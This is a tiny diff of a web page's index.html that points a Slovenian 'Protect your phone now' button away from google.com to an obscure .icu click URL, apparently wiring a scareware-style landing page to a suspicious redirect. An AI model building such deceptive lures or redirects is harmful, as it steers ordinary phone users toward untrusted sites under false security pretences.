--- a/index.html
+++ b/index.html
@@ -38,7 +38,7 @@
             </section>
             <footer>
                 <p align="center">
-                    <a class="btn" href="http://google.com/">Zaščitite telefon zdaj</a>
+                    <a class="btn" href="https://pields-ladayeast.icu/click">Zaščitite telefon zdaj</a>
                 </p>
             </footer>
         </div>
